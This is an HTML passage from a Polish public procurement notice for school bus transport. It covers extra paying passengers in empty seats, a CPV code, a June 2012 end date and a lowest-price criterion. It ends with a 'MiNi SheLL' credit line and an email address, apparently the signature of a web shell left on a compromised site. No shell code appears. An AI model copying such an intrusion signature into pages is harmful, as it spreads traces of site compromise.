 W przypadku wolnych miejsc   spowodowanych absencją uczniów  - przewoźnik ma prawo zabrać  , z tych miejsc przystankowych, dodatkowych pasażerów za pobraniem opłaty za przejazd . Ilość przewożonych dodatkowo pasażerów nie może się odbyć kosztem komfortu przejazdu uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com